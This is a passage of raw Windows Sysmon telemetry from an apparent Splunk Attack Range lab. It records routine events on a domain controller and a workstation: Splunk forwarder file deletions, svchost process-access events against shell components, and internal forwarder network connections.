23542300x8000000000000000291104Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:51.609{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=299224E286050B76F708C68A39287EB3,SHA256=8D54356252211E987676C22755067056D9FABE885A923E74F571539ABEDDD195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439768Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:51.089{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B302EF86B5ECCFA2B5011331BDDC43B,SHA256=DC98C4158F13696BDB444D1BC01B6589BEE2AD7C66028322D9E9FD9F794B5B4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439767Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:51.061{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439766Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:51.061{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439765Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:51.022{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF40A6B0D3F4EA8A470C5F17937DC948,SHA256=B966CDFC9F6168B716EB219E6E108C27DE15F111E705A9614CEA284403164C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291105Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:52.613{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=109F8A969E429A1D9080BC795FBC332B,SHA256=0AFB4F83362337A42BFCA33AC1B1C75A0A53EF23BB4B6FDAACD0A9FC8A2EC18A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439772Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:52.995{42DC5269-CE99-6086-1000-00000000BA01}364NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4AABBE7BF500B2F00D861BB94B1E36C0,SHA256=882E81FE01EA2B2B2B68FE30E702DAE993F8D36AC9144F0997AB1B1A85F8E288,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439771Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:52.062{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439770Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:52.062{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439769Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:52.028{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5E9CA76718B4C258AE120153EA86C44,SHA256=FF51AC185ED2F83E79DEA47169C78AC5786F0938DD422FA768B18C4BF31F7801,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291106Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:53.633{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=541A63789A277B0A95311B25EE343917,SHA256=16AF0F0A0551B2FFCC96754C5F840C39B978C5DDBDB3E39222BE793109A2844C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439775Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:53.063{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439774Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:53.063{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439773Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:53.033{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29431DCE300B5FD6CFC3CF5541E68CED,SHA256=354356555357372DFB6E3BE63AC7510CD1F087BFB416CB18FFE7B0116AA72675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291107Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:54.650{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3802813DA9D658AD42A45285CE6DD6B,SHA256=5F626F58DF0BBFFC73412053C5879897E424210D87C2F1C988D3A47BA1ACD361,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439780Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:51.527{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62372-false10.0.1.12-8000- 23542300x8000000000000000439779Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:54.097{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48A20731EB5150161DA262255FEC49A4,SHA256=E2205BF9836CE7D830DE3F983A5DEEC4A83817064E32C4C3106B080FE97AB19B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439778Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:54.064{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439777Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:54.064{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439776Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:54.059{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E123B6CFE5FC53D95F9FE096C3758EC7,SHA256=63729DAF86F4640B04D540981688C45B7867FD31A390E36F74BDF6B437F5D9E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291111Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:55.653{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F28B263FA71B4929A9C6E845C36811,SHA256=38B04A22EBF663C18DF8DB80458FF60C7C9ABB9DD38EFA43ADDD71B93661A318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439783Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:55.293{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=107A09DB2EEE6F484587FBB959D90FDD,SHA256=3B78F1102941CBBDCD705044A694EE573EC44B40D48787878CC12389A098DCA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291110Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:53.361{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50593-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291109Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:55.119{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED82152D2DC41C0A32430C71E758F42E,SHA256=650E4BC48DDBBBA1B8504F098E31CD401DF495932F5D628C49639BC9AD1EF93D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291108Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:55.118{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84F6662CA2CC937B9D4F1C2D1B9A5D98,SHA256=DBD93692C90A55BD5930869703D64D568730F601DB48DF6C3A7649D990718680,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439782Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:55.065{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439781Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:55.065{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439817Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.696{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B83970AB85303F34FA709C00320D4576,SHA256=089166BF73033A34AE5FB432F0D09BFFAD00043207CFB8C1D4457012127F7EC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291112Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:56.655{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1DCC37E117ADF0F6D3D198BA0177AD2,SHA256=AF04A3231EFEC5EAFF41F36348EC604C6F3A7EEB8913E8221A080ADD67DC15A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439816Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439815Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439814Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439813Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439812Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439811Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439810Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439809Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439808Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439807Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439806Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 